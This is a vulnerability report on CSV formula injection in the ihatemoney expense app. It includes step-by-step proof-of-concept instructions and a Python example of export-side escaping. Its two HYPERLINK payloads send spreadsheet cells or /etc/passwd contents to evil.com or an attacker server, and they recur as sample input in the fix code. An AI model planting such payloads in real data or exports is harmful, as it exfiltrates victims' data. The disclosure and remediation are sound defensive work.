Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in spiral-project/ihatemoney
May 7th 2022
Formula Injection/CSV Injection in the "For what?", "For whom?" and "How much?" fields of a bill, due to Improper Neutralization of Formula Elements in a CSV File (CWE-1236): values entered in these fields are written verbatim into the project's CSV export, so a value starting with a formula character is evaluated when the file is opened in a spreadsheet application.
Proof of Concept
1. Visit https://ihatemoney.org/, start the demo project and click "add new bill" at the top right. In the "What?" field enter one of the payloads below (the "For whom?" and "How much?" fields accept them in the same way).
2. Payloads ("[CR]" stands for a carriage return; for the second payload, start a Python HTTP server or a netcat listener on the host and port you put in the URL before opening the export):
=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")
=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "poc")
3. Go to the project settings (top right) and scroll to the bottom, to the "Download the project's data" feature.
4. Select "CSV" as the format and download.
5. Open the downloaded CSV in a spreadsheet application. The injected cells render as the links "poc" and "Error fetching info: Click me to resolve."; clicking them sends the user to evil.com or to the attacker's server. The first payload appends the contents of cells A3 and B3 to the request, and the second uses a LibreOffice-style external reference to read the first cell of /etc/passwd into the request.
Successful exploitation can lead to impacts such as client-side command injection, code execution, or remote exfiltration of confidential data contained in the spreadsheet or on the victim's machine. The attack requires a victim to open the export in a spreadsheet application and, in current Excel and LibreOffice versions, to accept the security prompts these applications show before following hyperlinks or updating external references; the server-side cause is that the export writes user-controlled cells without escaping formula characters.
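The following is an added example, not code from the report or from the ihatemoney project, showing the export-side fix in Python (the language ihatemoney is written in). The neutralization rule is the usual one for this weakness: any string cell starting with a formula trigger (=, +, -, @, tab or carriage return) is prefixed with a single quote so the spreadsheet treats it as text, and every field is quoted so that commas and double quotes inside a payload cannot escape the cell. The column names, the export function and the sample bills are assumptions made for the demonstration; the two payloads from the Proof of Concept are used as input, with the report's "[CR]" placeholder kept literally.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice Calc and Google Sheets
# evaluate an imported cell as a formula. Tab and carriage return are listed
# too, because some importers strip leading whitespace before checking for "=".
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value):
    """True when a string cell would be evaluated as a formula on import."""
    return isinstance(value, str) and value.startswith(FORMULA_TRIGGERS)


def neutralize_formula(value):
    """Escape one cell for CSV export.

    A string that starts with a formula trigger is prefixed with a single
    quote, which the major spreadsheets read as "treat this cell as text".
    Non-string values (a numeric amount column) are returned untouched, so a
    negative amount stays a number instead of becoming the text "'-12.5".
    """
    if is_formula_like(value):
        return "'" + value
    return value


def export_bills(bills, columns=("date", "what", "payer", "owers", "amount")):
    """Render bill dicts as CSV text with every cell neutralized and quoted.

    QUOTE_ALL wraps each field in double quotes and doubles any embedded
    double quote, so commas or quotes inside a payload cannot open a new cell.
    The column names are hypothetical, not ihatemoney's real export schema.
    """
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(columns)
    for bill in bills:
        writer.writerow([neutralize_formula(bill[col]) for col in columns])
    return out.getvalue()


def read_back(csv_text):
    """Parse exported CSV text back into rows, for round-trip checks."""
    return list(csv.reader(io.StringIO(csv_text)))


# Constructed sample rows. The first two "what" values are the payloads from
# the Proof of Concept ("[CR]" is the report's placeholder for a carriage
# return); the third is a harmless description that happens to start with "-".
SAMPLE_BILLS = [
    {"date": "2022-05-07", "payer": "alice", "owers": "bob", "amount": 12.5,
     "what": '=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")'},
    {"date": "2022-05-07", "payer": "alice", "owers": "bob", "amount": 8,
     "what": "=HYPERLINK(CONCATENATE(\"http://attackerserver:port/a.txt?v=\"; ('file:///etc/passwd'#$passwd.A1)); \"poc\")"},
    {"date": "2022-05-08", "payer": "bob", "owers": "alice", "amount": 3,
     "what": "- groceries, second run"},
]

if __name__ == "__main__":
    exported = export_bills(SAMPLE_BILLS)
    print(exported)
    # Every cell read back from the export should now be plain text.
    print(all(not is_formula_like(c) for row in read_back(exported)[1:] for c in row))
```

Escaping at export time, rather than rejecting formula-looking input on the bill form, is the right place for the fix: the stored data may already contain such values, a legitimate description can start with "-" or "+", and other export formats (JSON, the web UI) do not need the escape. The visible apostrophe in the text cell is the accepted cost of this approach. The `is_formula_like` check can additionally be used on input as a detection signal, but on its own it is not a fix, since the same data reaches the CSV through the API and the database.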